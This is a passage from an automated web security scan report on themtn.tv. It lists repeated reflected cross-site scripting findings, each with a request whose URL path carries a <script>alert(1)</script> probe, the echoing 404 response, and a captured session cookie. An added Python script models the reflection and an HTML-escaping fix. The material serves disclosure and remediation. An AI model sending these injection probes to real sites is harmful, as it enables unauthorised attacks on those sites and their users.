User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:50 GMT
Content-Length: 805
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.htmlad6b3<script>alert(1)</script>9828d68270"</strong>
...[SNIP]...

2.574. http://www.themtn.tv/12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10be6<script>alert(1)</script>2f27386048 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html10be6<script>alert(1)</script>2f27386048 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:47 GMT
Content-Length: 805
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html10be6<script>alert(1)</script>2f27386048"</strong>
...[SNIP]...

2.575. http://www.themtn.tv/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84c4d<script>alert(1)</script>72c69fd9274 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html84c4d<script>alert(1)</script>72c69fd9274 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:50 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html84c4d<script>alert(1)</script>72c69fd9274"</strong>
...[SNIP]...
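The themtn.tv findings in this section (2.575 onward) share one mechanism, which the following Python script models. It is an added example, not code from the report or from the themtn.tv site: vulnerable_404 and hardened_404 are a reconstruction (an assumption) of the error page from the <strong>"..."</strong> fragment visible in the captured responses, since the real server-side code is not shown; inject_segment builds a probe path the way the "REST URL parameter N" requests above are built; and classify_reflection decides from a response body whether the canary came back verbatim, HTML-encoded, partially encoded, or not at all. The captured fragment from finding 2.575 is embedded as sample input; every other input is constructed.

```python
import html
import re

# Probe in the same shape the scanner used: a random hex prefix, the
# script tag, and a random hex suffix. The prefix/suffix let the checker
# locate this specific reflection even if the page contains other script tags.
PROBE = "<script>alert(1)</script>"


def make_canary(prefix: str, suffix: str) -> str:
    return f"{prefix}{PROBE}{suffix}"


def inject_segment(path: str, index: int, canary: str) -> str:
    """Append the canary to the index-th path segment (1-based), which is how
    the report's "REST URL parameter N" requests are formed."""
    segments = path.lstrip("/").split("/")
    if not 1 <= index <= len(segments):
        raise IndexError(f"path has {len(segments)} segments, no segment {index}")
    segments[index - 1] += canary
    return "/" + "/".join(segments)


def vulnerable_404(request_path: str) -> str:
    """Reconstruction (assumption) of the error page in the captured responses:
    the requested path is written into a <strong> element unencoded."""
    return (
        "<html><body><p>The requested URL "
        f'<strong>"{request_path}"</strong> was not found.</p></body></html>'
    )


def hardened_404(request_path: str) -> str:
    """Same page with the one change that matters: encode the untrusted path
    for the HTML text context it lands in (quote=True also covers attributes)."""
    safe = html.escape(request_path, quote=True)
    return (
        "<html><body><p>The requested URL "
        f'<strong>"{safe}"</strong> was not found.</p></body></html>'
    )


def classify_reflection(body: str, canary: str) -> str:
    """Return 'unencoded' if the canary is reflected verbatim, 'encoded' if the
    prefix and suffix are present but no raw '<' survives between them,
    'partial' if the script tag was altered yet a raw '<' still got through,
    and 'absent' if the canary was not reflected at all."""
    if canary in body:
        return "unencoded"
    prefix, suffix = canary.split(PROBE)
    match = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.DOTALL)
    if match is None:
        return "absent"
    return "partial" if "<" in match.group(1) else "encoded"


# Response fragment copied from finding 2.575 above (the only non-constructed input).
CAPTURED_2_575 = (
    '<strong>"/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html'
    '84c4d<script>alert(1)</script>72c69fd9274"</strong>'
)
CANARY_2_575 = make_canary("84c4d", "72c69fd9274")


if __name__ == "__main__":
    print("2.575 capture:", classify_reflection(CAPTURED_2_575, CANARY_2_575))
    probe_path = inject_segment("/common/dynrss/dynrss_3174_landing_.rss", 2, CANARY_2_575)
    print("probe path:   ", probe_path)
    print("vulnerable:   ", classify_reflection(vulnerable_404(probe_path), CANARY_2_575))
    print("hardened:     ", classify_reflection(hardened_404(probe_path), CANARY_2_575))
```

Running the script classifies the captured fragment as unencoded and shows the reconstructed vulnerable page failing while the hardened page passes. The random hex on both sides of the script tag is why the scanner's payloads look the way they do: it lets a checker tell this reflection apart from any other script tag on the page, and it is what makes "encoded" distinguishable from "absent".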

2.576. http://www.themtn.tv/12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6ecb8<script>alert(1)</script>5cb81e80486 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html6ecb8<script>alert(1)</script>5cb81e80486 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:49 GMT
Content-Length: 797
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html6ecb8<script>alert(1)</script>5cb81e80486"</strong>
...[SNIP]...

2.577. http://www.themtn.tv/12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 37474<script>alert(1)</script>2767a74a520 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html37474<script>alert(1)</script>2767a74a520 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:56 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html37474<script>alert(1)</script>2767a74a520"</strong>
...[SNIP]...

2.578. http://www.themtn.tv/12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 90aa2<script>alert(1)</script>d822eeaa35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html90aa2<script>alert(1)</script>d822eeaa35 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:57 GMT
Content-Length: 805
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html90aa2<script>alert(1)</script>d822eeaa35"</strong>
...[SNIP]...

2.579. http://www.themtn.tv/12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 30a2e<script>alert(1)</script>e374858b3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html30a2e<script>alert(1)</script>e374858b3f9 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:56 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html30a2e<script>alert(1)</script>e374858b3f9"</strong>
...[SNIP]...

2.580. http://www.themtn.tv/12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83f1a<script>alert(1)</script>d7cbbdda941 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html83f1a<script>alert(1)</script>d7cbbdda941 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:00 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html83f1a<script>alert(1)</script>d7cbbdda941"</strong>
...[SNIP]...

2.581. http://www.themtn.tv/12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 814ee<script>alert(1)</script>ee47c2c20b4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html814ee<script>alert(1)</script>ee47c2c20b4 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:04 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html814ee<script>alert(1)</script>ee47c2c20b4"</strong>
...[SNIP]...

2.582. http://www.themtn.tv/12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 49a89<script>alert(1)</script>cab4e73d633 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html49a89<script>alert(1)</script>cab4e73d633 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:00 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html49a89<script>alert(1)</script>cab4e73d633"</strong>
...[SNIP]...

2.583. http://www.themtn.tv/12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd355<script>alert(1)</script>1470f4268fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.htmlfd355<script>alert(1)</script>1470f4268fb HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:00 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.htmlfd355<script>alert(1)</script>1470f4268fb"</strong>
...[SNIP]...

2.584. http://www.themtn.tv/12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 343c1<script>alert(1)</script>541d76c6c86 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html343c1<script>alert(1)</script>541d76c6c86 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:02 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html343c1<script>alert(1)</script>541d76c6c86"</strong>
...[SNIP]...

2.585. http://www.themtn.tv/12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80565<script>alert(1)</script>0ff5d89c640 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html80565<script>alert(1)</script>0ff5d89c640 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:02 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html80565<script>alert(1)</script>0ff5d89c640"</strong>
...[SNIP]...

2.586. http://www.themtn.tv/12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c3e3b<script>alert(1)</script>199ea53854b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.htmlc3e3b<script>alert(1)</script>199ea53854b HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:05 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.htmlc3e3b<script>alert(1)</script>199ea53854b"</strong>
...[SNIP]...

2.587. http://www.themtn.tv/12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4eb51<script>alert(1)</script>0d56f34802e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html4eb51<script>alert(1)</script>0d56f34802e HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:02 GMT
Content-Length: 805
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html4eb51<script>alert(1)</script>0d56f34802e"</strong>
...[SNIP]...

2.588. http://www.themtn.tv/common/ad_count.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/ad_count.php

Issue detail

